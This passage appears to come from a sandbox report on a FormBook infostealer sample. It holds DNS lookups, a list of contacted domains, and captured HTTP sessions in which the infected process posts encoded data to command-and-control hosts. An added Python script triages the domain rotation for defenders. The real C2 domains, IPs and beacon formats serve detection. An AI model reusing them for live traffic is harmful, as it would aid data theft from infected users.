Nov 17, 2024 08:38:06.608757019 CET | 1.1.1.1 | 192.168.2.4 | 0x808e | No error (0) | s9gzg9.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:19.959871054 CET | 1.1.1.1 | 192.168.2.4 | 0xdd23 | No error (0) | www.oneid.ink | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:38:19.959871054 CET | 1.1.1.1 | 192.168.2.4 | 0xdd23 | No error (0) | ghs.googlehosted.com | | 172.217.18.19 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:34.175879002 CET | 1.1.1.1 | 192.168.2.4 | 0xd88b | No error (0) | www.extrem.tech | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:34.175879002 CET | 1.1.1.1 | 192.168.2.4 | 0xd88b | No error (0) | www.extrem.tech | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:47.723491907 CET | 1.1.1.1 | 192.168.2.4 | 0x8e9e | No error (0) | www.everyone.golf | everyone.golf | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:38:47.723491907 CET | 1.1.1.1 | 192.168.2.4 | 0x8e9e | No error (0) | everyone.golf | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:47.723491907 CET | 1.1.1.1 | 192.168.2.4 | 0x8e9e | No error (0) | everyone.golf | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:39:03.996607065 CET | 1.1.1.1 | 192.168.2.4 | 0x1a9c | No error (0) | www.booosted.xyz | booosted.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:39:03.996607065 CET | 1.1.1.1 | 192.168.2.4 | 0x1a9c | No error (0) | booosted.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:39:03.996607065 CET | 1.1.1.1 | 192.168.2.4 | 0x1a9c | No error (0) | booosted.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
• www.arcare.partners
• www.bejho.net
• www.jagdud.store
• www.nieuws-july202541.sbs
• www.bandukchi.com
• www.gcast.video
• www.rtpsilva4d.click
• www.bearableguy.net
• www.funddata-x.net
• www.s9gzg9.vip
• www.oneid.ink
• www.extrem.tech
• www.everyone.golf
• www.booosted.xyz
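Two things stand out in the DNS tables above: the sample issues one lookup roughly every 13 to 16 seconds, each for a different name, and seven of the fifteen names resolve to the same address pair (3.33.130.190 and 15.197.148.33). The script below is an added example, not part of the Joe Sandbox report, that turns those observations into a triage check: it measures how regular the lookup cadence is and clusters names by resolved address, so names that share one address pair can be set aside as decoy candidates (FormBook configs carry decoy domains next to the live C2) and the remaining resolved names can be prioritised for pivoting. The input is the report's rows copied into a plain two-column form; the thresholds in rotation_triage() are assumptions chosen for this trace, not a vendor signature.

```python
"""Triage the DNS rows of a sandbox trace for FormBook-style domain rotation.

Added example, not part of the Joe Sandbox report. QUERIES and ANSWERS are the
report's query timestamps and final A records copied into a plain text form;
the thresholds in rotation_triage() are assumptions for this trace.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed input: one DNS query per line, timestamp exactly as the report prints it.
QUERIES = """\
Nov 17, 2024 08:35:53.798593044 CET www.arcare.partners
Nov 17, 2024 08:36:09.847253084 CET www.bejho.net
Nov 17, 2024 08:36:23.454632044 CET www.jagdud.store
Nov 17, 2024 08:36:36.876545906 CET www.dagoovis.org
Nov 17, 2024 08:36:44.941035032 CET www.nieuws-july202541.sbs
Nov 17, 2024 08:36:58.423949957 CET www.bandukchi.com
Nov 17, 2024 08:37:11.737153053 CET www.gcast.video
Nov 17, 2024 08:37:25.486367941 CET www.rtpsilva4d.click
Nov 17, 2024 08:37:38.877665043 CET www.bearableguy.net
Nov 17, 2024 08:37:53.064559937 CET www.funddata-x.net
Nov 17, 2024 08:38:06.596693039 CET www.s9gzg9.vip
Nov 17, 2024 08:38:19.924885035 CET www.oneid.ink
Nov 17, 2024 08:38:34.135893106 CET www.extrem.tech
Nov 17, 2024 08:38:47.705892086 CET www.everyone.golf
Nov 17, 2024 08:39:03.955667973 CET www.booosted.xyz
"""

# Constructed input: A records reached per queried name (CNAME chains collapsed); "-" marks NXDOMAIN.
ANSWERS = """\
www.arcare.partners 3.33.130.190 15.197.148.33
www.bejho.net 64.225.91.73
www.jagdud.store 209.74.64.187
www.dagoovis.org -
www.nieuws-july202541.sbs 162.0.215.33
www.bandukchi.com 3.33.130.190 15.197.148.33
www.gcast.video 98.124.224.17
www.rtpsilva4d.click 67.223.117.169
www.bearableguy.net 3.33.130.190 15.197.148.33
www.funddata-x.net 3.33.130.190 15.197.148.33
www.s9gzg9.vip 3.33.130.190 15.197.148.33
www.oneid.ink 172.217.18.19
www.extrem.tech 13.248.169.48 76.223.54.146
www.everyone.golf 3.33.130.190 15.197.148.33
www.booosted.xyz 3.33.130.190 15.197.148.33
"""

TS_RE = re.compile(r"^(.*\.\d{6})\d*\s+[A-Z]+$")


def parse_ts(text: str) -> datetime:
    """Parse 'Nov 17, 2024 08:35:53.798593044 CET'. strptime's %f takes at most
    six fractional digits, so the nanosecond tail is cut; the zone tag is
    dropped because every row of the trace uses the same one."""
    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def parse_queries(text: str) -> list:
    rows = []
    for line in text.splitlines():
        if line.strip():
            ts_part, name = line.rsplit(" ", 1)
            rows.append((parse_ts(ts_part), name))
    return rows


def parse_answers(text: str) -> dict:
    answers = {}
    for line in text.splitlines():
        if line.strip():
            name, *addrs = line.split()
            answers[name] = [a for a in addrs if a != "-"]
    return answers


def beacon_stats(rows, tolerance: float = 0.25) -> dict:
    """Distinct names, median gap between lookups and the share of gaps within
    +/-tolerance of that median (a sleep loop with small jitter scores high)."""
    gaps = [(b - a).total_seconds() for (a, _), (b, _) in zip(rows, rows[1:])]
    median = statistics.median(gaps)
    regular = sum(abs(g - median) <= tolerance * median for g in gaps)
    return {
        "lookups": len(rows),
        "distinct": len({n for _, n in rows}),
        "median_gap_s": median,
        "regular_fraction": regular / len(gaps),
        "span_s": (rows[-1][0] - rows[0][0]).total_seconds(),
    }


def shared_ip_clusters(answers: dict, min_names: int = 3) -> dict:
    """Group names by resolved address; many unrelated names behind one address
    pair is what parked or decoy domains look like."""
    by_ip = defaultdict(set)
    for name, addrs in answers.items():
        for a in addrs:
            by_ip[a].add(name)
    return {ip: names for ip, names in by_ip.items() if len(names) >= min_names}


def rotation_triage(rows, answers, min_distinct: int = 8, min_regular: float = 0.8) -> dict:
    stats = beacon_stats(rows)
    clusters = shared_ip_clusters(answers)
    decoys = set().union(*clusters.values()) if clusters else set()
    remaining = [n for _, n in rows if answers.get(n) and n not in decoys]
    rotating = (stats["distinct"] >= min_distinct
                and stats["distinct"] == stats["lookups"]
                and stats["regular_fraction"] >= min_regular)
    return {**stats, "rotating_beacon": rotating,
            "decoy_candidates": sorted(decoys), "worth_pivoting_on": remaining}


if __name__ == "__main__":
    for key, value in rotation_triage(parse_queries(QUERIES), parse_answers(ANSWERS)).items():
        print(f"{key}: {value}")
```

The regularity score is the share of gaps within a band around the median rather than a maximum-deviation test, because a single long or short gap (the 8 s gap before www.nieuws-july202541.sbs here) would otherwise hide an otherwise steady sleep loop. A shared address pair is a reason to deprioritise a name, not to discard it: the cluster check only tells you which names are unlikely to be the live C2, and www.bejho.net, the host that receives the POSTs further down, lands in the remaining set.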
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:35:53.848566055 CET | 504 | OUT | GET /veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Host: www.arcare.partners
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Nov 17, 2024 08:35:54.802305937 CET | 400 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Sun, 17 Nov 2024 07:35:54 GMT
Content-Type: text/html
Content-Length: 260
Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 5a 61 43 49 5a 75 46 6c 37 77 5a 45 70 74 47 72 38 6f 47 51 50 2b 78 62 30 41 2f 4a 33 37 59 71 36 51 43 67 39 62 4f 43 73 57 6e 39 31 69 65 65 46 47 58 47 42 33 55 78 56 53 6f 49 49 48 46 73 2f 52 32 6f 66 65 51 56 30 54 76 65 55 38 57 68 54 36 7a 58 61 74 61 37 30 6b 32 77 55 65 32 53 74 35 37 4f 4f 79 56 4b 67 37 43 48 55 79 41 4b 58 65 31 7a 37 4e 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49792 | 64.225.91.73 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:36:09.973157883 CET | 751 | OUT | POST /zhgj/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.bejho.net
Origin: http://www.bejho.net
Referer: http://www.bejho.net/zhgj/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 45 66 30 76 68 35 77 73 31 65 4a 51 54 68 2f 36 42 71 32 5a 78 4f 54 36 39 2f 79 63 6c 75 57 2f 2b 32 43 49 6b 41 31 51 42 79 70 79 4d 67 42 55 34 39 69 2b 33 66 59 46 5a 52 61 33 39 49 46 75 51 4a 44 35 74 57 6c 56 41 5a 70 2b 49 48 41 6c 78 6f 76 37 32 38 36 43 32 43 53 42 76 36 58 31 45 65 76 6d 61 4f 79 6e 70 4d 50 39 71 33 47 69 2f 5a 56 72 38 55 76 74 38 67 51 48 31 61 6e 44 66 43 44 76 68 50 56 41 66 52 75 59 71 35 47 44 46 30 43 66 36 6a 78 6a 7a 31 2f 52 73 4e 41 72 39 42 59 50 6f 70 6b 65 6b 6f 51 53 67 79 35 64 59 4b 76 7a 75 48 6a 68 65 4b 32 2f 49 61 79 7a 65 67 3d 3d
                                                                                Data Ascii: Y8i=Ef0vh5ws1eJQTh/6Bq2ZxOT69/ycluW/+2CIkA1QBypyMgBU49i+3fYFZRa39IFuQJD5tWlVAZp+IHAlxov7286C2CSBv6X1EevmaOynpMP9q3Gi/ZVr8Uvt8gQH1anDfCDvhPVAfRuYq5GDF0Cf6jxjz1/RsNAr9BYPopkekoQSgy5dYKvzuHjheK2/Iayzeg==
Nov 17, 2024 08:36:10.638700962 CET | 601 | IN | HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Sun, 17 Nov 2024 07:36:10 GMT
content-type: text/html
last-modified: Wed, 22 Feb 2023 21:25:52 GMT
etag: W/"63f68860-251"
content-encoding: gzip
connection: close
transfer-encoding: chunked
                                                                                Data Raw: 31 35 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 52 c1 6e c2 30 0c bd f3 15 56 4f ad 06 6d a7 69 17 68 bb d3 fe 60 3f d0 b5 ee 12 94 c6 90 b8 20 34 f1 ef 73 52 18 0c ed e6 d8 cf cf cf cf a9 14 8f a6 59 54 0a db be 59 00 54 23 72 0b 8a 79 b7 c2 fd a4 0f 75 e2 70 70 e8 55 02 1d 59 46 cb 75 f2 ba 99 9c a9 03 c6 af 8b c2 d2 d6 e7 3d 8d ad b6 9d 65 47 26 ef 68 4c a0 10 d2 62 66 ad 3e a9 3f 45 72 df 39 bd e3 10 02 18 64 70 c8 4e a3 87 1a 5e 96 a0 85 de 1d 5a 23 af e7 b2 2c 37 11 95 0e 93 ed 58 93 8d d8 53 9a c1 77 cc 03 0c c8 9d 4a 93 ab 8c 47 05 c5 1b 39 fd a5 c8 8b 60 78 82 a3 b6 3d 1d 73 43 5d 1b d8 72 25 6b 65 17 26 80 9c 15 da 54 d6 dc 91 f5 08 75 23 d3 e6 38 df 7a b2 69 f6 08 ed 5b 71 49 60 ff d1 8a fe 50 be 6b 91 99 22 15 9d 23 17 9a ae 1b 04 17 f4 00 32 77 76 a1 81 f2 b6 5e 28 82 c8 88 a5 d5 6a 76 63 4e 02 78 e4 0f 3d 22 4d 1c 9b 4f 37 f3 b2 7b e0 19 d0 c8 3a f7 f3 20 9c d1 93 c1 3c ca 49 93 f7 a0 6a 0d c9 12 62 e2 6f ff af 41 e7 4b fe 9c a5 31 aa 8a eb 29 ab 62 be ae 1c 3b fe a4 1f e5 c9 cd 5c 51 [TRUNCATED]
                                                                                Data Ascii: 150mRn0VOmih`? 4sRYTYT#ryuppUYFu=eG&hLbf>?Er9dpN^Z#,7XSwJG9`x=sC]r%ke&Tu#8zi[qI`Pk"#2wv^(jvcNx="MO7{: <IjboAK1)b;\Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49807 | 64.225.91.73 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:36:12.521907091 CET | 771 | OUT | POST /zhgj/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.bejho.net
Origin: http://www.bejho.net
Referer: http://www.bejho.net/zhgj/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 45 66 30 76 68 35 77 73 31 65 4a 51 53 41 50 36 53 62 32 5a 30 75 54 35 68 76 79 63 7a 65 58 30 2b 32 4f 49 6b 46 4e 36 41 45 5a 79 4e 46 6c 55 37 38 69 2b 79 66 59 46 54 78 61 79 7a 6f 46 78 51 4a 50 48 74 54 64 56 41 5a 39 2b 49 48 51 6c 77 62 48 36 6e 38 36 41 37 69 53 48 72 36 58 31 45 65 76 6d 61 4f 6e 36 70 4d 58 39 71 6e 32 69 74 37 39 6f 30 30 76 79 2f 67 51 48 69 71 6e 50 66 43 44 33 68 4f 49 56 66 54 6d 59 71 38 69 44 46 6d 72 4a 78 6a 78 68 74 46 2b 59 69 38 6f 76 77 42 56 78 68 4b 4d 63 6a 63 4d 79 68 30 6f 48 4a 37 4f 6b 38 48 48 53 44 4e 2f 4c 46 5a 50 36 46 6d 4f 78 54 58 74 4e 4e 4e 77 48 66 6f 6a 6b 66 32 4a 74 73 73 6b 3d
                                                                                Data Ascii: Y8i=Ef0vh5ws1eJQSAP6Sb2Z0uT5hvyczeX0+2OIkFN6AEZyNFlU78i+yfYFTxayzoFxQJPHtTdVAZ9+IHQlwbH6n86A7iSHr6X1EevmaOn6pMX9qn2it79o00vy/gQHiqnPfCD3hOIVfTmYq8iDFmrJxjxhtF+Yi8ovwBVxhKMcjcMyh0oHJ7Ok8HHSDN/LFZP6FmOxTXtNNNwHfojkf2Jtssk=
                                                                                Nov 17, 2024 08:36:13.200416088 CET | 601 | IN | HTTP/1.1 200 OK
                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                date: Sun, 17 Nov 2024 07:36:13 GMT
                                                                                content-type: text/html
                                                                                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                etag: W/"63f68860-251"
                                                                                content-encoding: gzip
                                                                                connection: close
                                                                                transfer-encoding: chunked


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                3 | 192.168.2.4 | 49822 | 64.225.91.73 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:36:15.063832998 CET | 10853 | OUT | POST /zhgj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bejho.net
                                                                                Origin: http://www.bejho.net
                                                                                Referer: http://www.bejho.net/zhgj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:15.743299961 CET | 601 | IN | HTTP/1.1 200 OK
                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                date: Sun, 17 Nov 2024 07:36:15 GMT
                                                                                content-type: text/html
                                                                                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                etag: W/"63f68860-251"
                                                                                content-encoding: gzip
                                                                                connection: close
                                                                                transfer-encoding: chunked


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                4 | 192.168.2.4 | 49838 | 64.225.91.73 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:36:17.727854967 CET | 498 | OUT | GET /zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.bejho.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:18.409260035 CET | 835 | IN | HTTP/1.1 200 OK
                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                date: Sun, 17 Nov 2024 07:36:18 GMT
                                                                                content-type: text/html
                                                                                content-length: 593
                                                                                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                etag: "63f68860-251"
                                                                                accept-ranges: bytes
                                                                                connection: close
                                                                                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                5 | 192.168.2.4 | 49869 | 209.74.64.187 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:36:23.509216070 CET | 760 | OUT | POST /ohf8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jagdud.store
                                                                                Origin: http://www.jagdud.store
                                                                                Referer: http://www.jagdud.store/ohf8/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=onR9AvgxrVBHW1CBoThJet9LRKo7HvCK7LTc/8vMMRqIz4hL9+9avVIEsgBlul+o9nY5KjJfkIilw8t9SIo+BKoW10MhAjNjZG5tCg4qzeRmsl7qEVqqeqzQyf6PvjWw/XNZm0vWnV8w/UD7sycImcJwBRrb4absii2m2cLvmGU6ocgLDfrOst0mZaMu+GCrDw==
                                                                                Nov 17, 2024 08:36:24.217346907 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:24 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.2.4 | 49884 | 209.74.64.187 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:36:26.046874046 CET | 780 | OUT | POST /ohf8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jagdud.store
                                                                                Origin: http://www.jagdud.store
                                                                                Referer: http://www.jagdud.store/ohf8/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiOIzZxLvqRa/FIE4QBsgF+v9ncHKmxfkImlw9d9Sbw9DaoYp0MjdzNjZG5tCgcQza1mrULqEwKpdqzXmP6PrjX5/XN/m1zwnTww/Vz7sg0LscJyPxqt+q2EkQ3Y/LjbkmtdtaxRSuKZ+tQVEdFazF/iYyPXA7DR56yzdNG8nVNM2lE=
                                                                                Nov 17, 2024 08:36:26.715523958 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                7 | 192.168.2.4 | 49900 | 209.74.64.187 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:36:28.596765041 CET | 10862 | OUT | POST /ohf8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jagdud.store
                                                                                Origin: http://www.jagdud.store
                                                                                Referer: http://www.jagdud.store/ohf8/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:29.281151056 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:29 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.2.4 | 49915 | 209.74.64.187 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:36:31.137388945 CET | 501 | OUT | GET /ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.jagdud.store
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:31.825643063 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:36:31 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                9           192.168.2.4  49989        162.0.215.33    80                3604  C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 17, 2024 08:36:45.010999918 CET  787                OUT        POST /0bvv/ HTTP/1.1
